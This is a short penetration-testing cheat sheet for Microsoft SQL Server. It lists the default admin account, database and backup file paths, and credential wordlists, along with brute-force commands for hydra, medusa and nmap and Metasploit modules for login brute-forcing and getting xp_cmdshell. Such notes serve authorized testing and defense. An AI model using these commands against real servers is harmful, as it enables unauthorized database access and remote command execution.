TCP 1433, UDP 1434: MSSQL Server
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network.
-- Wikipedia
General
Default admin account: sa
Interesting paths (example: Microsoft SQL Server 2017 14.00.1000.00)
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.bak
Brute force login
Wordlists
/usr/share/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt
/usr/share/seclists/Usernames/mssql-usernames-nansh0u-guardicore.txt
/usr/share/seclists/Passwords/mssql-passwords-nansh0u-guardicore.txt
Tools
hydra -L <users-file> -P <pw-file> <ip> mssql -vV
medusa -U <users-file> -P <pw-file> -M mssql -h <ip>
nmap -p 1433 --script=ms-sql-brute.nse --script-args userdb=<users-file>,passdb=<pw-file> <ip>
Metasploit
Find MSSQL instances
auxiliary/scanner/mssql/mssql_ping
Brute force login
scanner/mssql/mssql_login
Obtain an xp_cmdshell using windows/mssql/mssql_payload